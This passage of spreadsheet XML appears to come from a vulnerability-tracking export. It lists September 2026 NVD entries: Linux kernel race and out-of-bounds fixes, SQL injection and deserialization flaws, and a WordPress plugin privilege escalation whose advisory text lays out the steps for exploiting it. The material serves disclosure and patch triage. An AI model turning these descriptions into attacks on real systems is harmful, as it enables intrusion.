          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr"/>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_ptp: Fix napi_gro_receive() call from GC workqueue context
Currently mlxsw_sp1_ptp_ht_gc_collect() is run from the PTP
garbage-collection workqueue, rather than the NAPI poll context. For any
unmatched PTP entries carrying an SKB, it calls
mlxsw_sp1_ptp_unmatched_finish() -&gt; mlxsw_sp1_ptp_packet_finish(). For
ingress packets, this calls mlxsw_sp_rx_listener_no_mark_func(). The end
of that function is the following:
    skb-&gt;protocol = eth_type_trans(skb, skb-&gt;dev);
    napi_gro_receive(mlxsw_skb_cb(skb)-&gt;rx_md_info.napi, skb);
The napi pointer is one that was placed in the SKB control block when the
trapped packet was received in the NAPI context. Later, when the GC reaps
the unmatched entry (up to MLXSW_SP1_PTP_HT_GC_TIMEOUT later), the call to
napi_gro_receive() mutates the NAPI instance's GRO list, which is unsafe
if the poll is running concurrently on another CPU.
In mlxsw_sp1_ptp_ht_gc_collect(), local_bh_disable() is called to prevent
softirq processing, but this only applies to the local CPU. Additionally,
its comment is stale. It states that mlxsw_sp1_ptp_unmatched_finish()
invokes netif_receive_skb(). This has not been accurate since the
referenced commit; this patch makes that comment accurate again.
mlxsw_pci_napi_devs_init() calls netif_threaded_enable() on the NAPI RX
net_device without any conditions. The NAPI instance's poll, which may be
running concurrent to the GC, is running as an independently-scheduled
kthread which may be on a different CPU. The call to local_bh_disable()
does not guard against this.
If a tx-timestamp timeout produces an unmatched entry (which can be easily
reproduced by running ptp4l and waiting for a port to reach the
UNCALIBRATED/SLAVE state) while the owning NAPI thread is in the middle of
a poll on another CPU, both sides mutate the GRO list concurrently, as
shown below:
  [39.846] port 1 (swp1): MASTER to UNCALIBRATED on RS_SLAVE
  list_add corruption. next-&gt;prev should be prev (ffff8d620faf4138), but was ffff8d624150f700. (next=ffff8d620faf4138).
  kernel BUG at lib/list_debug.c:29!
  Oops: invalid opcode: 0000 [#1] SMP PTI
  CPU: 1 UID: 0 PID: 539 Comm: napi/mlxsw_rx-0 Not tainted 6.18.48 #1-NixOS PREEMPT(lazy)
  Hardware name: Mellanox Technologies Ltd. MSN2410/VMOD0001, BIOS 4.6.5 09/13/2018
  RIP: 0010:__list_add_valid_or_report+0x79/0xb0
  RSP: 0018:ffffcdf8c0f27c08 EFLAGS: 00010246
  RAX: 0000000000000075 RBX: ffff8d624150fd00 RCX: 0000000000000000
  RDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff8d6315d1e540
  RBP: ffff8d620faf4070 R08: 0000000000000000 R09: 00000000ffffdfff
  R10: ffffffffa5c60fe0 R11: ffffcdf8c0f27ab8 R12: 0000000000000003
  R13: 000000000000003d R14: 00000000000001bc R15: 0000000000000001
  FS:  0000000000000000(0000) GS:ffff8d636f63f000(0000) knlGS:0000000000000000
  CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
  CR2: 0000562689a60c24 CR3: 000000015f224004 CR4: 00000000001726f0
  Call Trace:
  &lt;TASK&gt;
  gro_receive_skb+0xee/0x230
  mlxsw_sp1_ptp_got_packet+0x61/0x140 [mlxsw_spectrum]
  mlxsw_core_skb_receive+0xdf/0x1b0 [mlxsw_core]
  mlxsw_pci_napi_poll_cq_rx+0x780/0x9d0 [mlxsw_pci]
  __napi_poll+0x31/0x1e0
  napi_threaded_poll_loop+0x16b/0x1c0
  napi_threaded_poll+0x71/0xa0
  kthread+0xfb/0x260
  ret_from_fork+0x22d/0x260
  ret_from_fork_asm+0x1a/0x30
  &lt;/TASK&gt;
  Kernel panic - not syncing: Fatal exception in interrupt
The machinery that leads to this kernel panic has not been changed between
6.18.48 and mainline.
This patch adds an ingress-delivery helper for the PTP packet_finish()
path that calls netif_receive_skb() instead of napi_gro_receive().
netif_receive_skb(), unlike napi_gro_receive(), can be called from outside
of the NAPI instance's poll context, which can occur at the call site for
this path. RX stats accounting and the skb-&gt;dev assignment are still
preserved; the only change is the delivery call itself.
This removes GR
---truncated---</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98050</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98056</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr"/>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme: remove stale namespaces by NSID range during scan
nvme_scan_ns_list() drops the stale namespaces in each gap in the
reported NSID list one NSID at a time. Every iteration calls
nvme_find_get_ns() to look the namespace up and removes it if it is
present. The loop runs once per NSID in the gap rather than once per
namespace actually present.
NSIDs are 32-bit, so a target with a sparse NSID space can make a
single gap spin the loop billions of times with nothing to remove.
  watchdog: BUG: soft lockup - CPU#4 stuck for 26s!
  Workqueue: nvme-wq nvme_scan_work [nvme_core]
  RIP: 0010:__srcu_read_unlock+0xb/0x20
  Call Trace:
   nvme_find_get_ns+0x7d/0xb0 [nvme_core]
   nvme_scan_ns_list+0xe8/0x280 [nvme_core]
   nvme_scan_work+0x18a/0x280 [nvme_core]
   process_one_work+0x197/0x380
   worker_thread+0x2fe/0x410
   kthread+0xe0/0x100
Rename nvme_remove_invalid_namespaces() to nvme_remove_nsid_range()
and give it an open (start, end) NSID range. ctrl-&gt;namespaces is
sorted by NSID, so the whole gap is dropped in a single walk that
stops once end is reached. This bounds the work by the namespaces
that are present instead of by the size of the gap.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98056</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98108</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr"/>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: L2CAP: fix chan mode for LE_CONN_REQ + EXT_FLOWCTL pchan
l2cap_new_connection() sets default value of channel mode to match the
parent channel.  l2cap_le_connect_req() left this at the default, and
created L2CAP_MODE_EXT_FLOWCTL channels if listening pchan has that
mode.  This causes FLAG_DEFER_SETUP channels to reply to
L2CAP_LE_CONN_REQ with L2CAP_ECRED_CONN_RSP, which is incorrect.
It can also result to stack OOB write (of l2cap_alloc_cid determined
values) in l2cap_ecred_rsp_defer(), as l2cap_le_connect_req() does not
limit maximum number of deferred channels or check for duplicate ident.
Fix by setting chan-&gt;mode correctly in l2cap_le_connect_req().
Also check channel mode in l2cap_ecred_rsp_defer(), and do WARN_ON_ONCE
instead of OOB write to make it less brittle.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98108</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100390</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>Zoraxy versions 3.2.3 through 3.3.4 fail to properly parse IPv6 addresses in the RemoteAddr field when setting forwarded headers. Unauthenticated attackers connecting over IPv6 can supply arbitrary X-Forwarded-For values to spoof their source IP and bypass authorization provider IP-based access controls.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100390</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98096</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr"/>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: sr: restore network header before routing and forwarding
ipv6_srh_rcv() runs with skb-&gt;data at the Segment Routing Header (SRH)
while skb_network_header() points at the IPv6 header.
When segments_left &gt; 0, ipv6_srh_rcv() previously restored the skb-&gt;data
position by pushing sizeof(struct ipv6hdr), assuming the SRH immediately
followed the fixed IPv6 header. If another extension header (such as a
Hop-by-Hop options header) precedes the SRH, skb_network_offset()
remained negative.
This led to two problems:
1. During ip6_route_input(), fib6_rules_early_flow_dissect() invokes
   __skb_flow_dissect() which passes the negative skb_network_offset()
   to flow dissection, breaking BPF and C flow dissector logic.
2. If forwarded via ip6_forward() or redirected via act_mirred, downstream
   handlers (like sch_fragment() or neighbour output) pass the negative
   offset as an unsigned length, triggering OOB memcpy or buffer overflows.
Fix this by pushing -skb_network_offset(skb) before routing, ensuring
skb_network_offset(skb) is 0 for route lookup / flow dissection as well as
downstream forwarding. On the loopback path, pull skb_transport_offset(skb)
to restore skb-&gt;data to the SRH before looping back.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98096</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100310</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>GNU libextractor before 1.16 loads plugins from an untrusted search path specified by the LIBEXTRACTOR_PREFIX environment variable without proper privilege checks. A local attacker can exploit this by setting LIBEXTRACTOR_PREFIX to a directory containing a malicious plugin that executes arbitrary code with elevated privileges when loaded by a setuid or setgid program.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100310</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100530</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 fail to bind working directory context to reusable exec approvals, allowing approved commands to execute in different directories. Attackers with an allow-always approval can reuse it to run the same command against unreviewed files or repositories with materially different effects.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100530</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93901</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>php, express, gin, hp</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>The Optima Express IDX plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 8.7.5. This is due to the `provisionBlogCredentials()` function in `iHomefinderAdmin.php` being reachable via the `wp_ajax_nopriv_ihf_clear_cache` AJAX action — through the call chain `iHomefinderAjaxHandler::clearCache()` → `activateAuthenticationToken()` → `getAuthenticationInfo()` → `provisionBlogCredentials()` — with no capability check, nonce verification, or ownership validation, and the function unconditionally calling `$user-&gt;set_role('author')` on whichever WordPress account matches the hard-coded login `optima-express` via `get_user_by('login', 'optima-express')`. This makes it possible for unauthenticated attackers to escalate a pre-registered `optima-express` account to the Author role, gaining `publish_posts`, `upload_files`, and `edit_published_posts` capabilities, including access to the plugin's own `/wp-json/optima-express/v1/blog-post` REST endpoint. Exploitation requires open user registration to be enabled on the target site, and the attacker must register the `optima-express` username before the plugin has had the opportunity to provision that login for its own integration account.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93901</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97865</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-502</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Open-Web-Analytics up to 1.8.1. Affected is the function Event::loadFromArray of the file queue.php of the component Remote Event Queue Endpoint. Performing a manipulation results in deserialization. The attack can be initiated remotely. Upgrading to version 1.8.2 is able to address this issue. The patch is named 78c1222ec0e2119d84684032da1541120a2cdd23. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97865</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97871</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-94</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Zhonglun CloudPos up to 3.0.1.76. This issue affects the function OpenLocalBrowser of the file ZlPos/ZlPos/Bizlogic/JSBridge.cs of the component JSBridge. Such manipulation of the argument url leads to code injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97871</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97882</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. The impacted element is an unknown function of the file loginlinkfaculty.php of the component Faculty Authentication. Executing a manipulation of the argument fid/pass can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97882</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97883</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This affects an unknown function of the file updatequery.php. The manipulation of the argument gid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97883</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97885</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
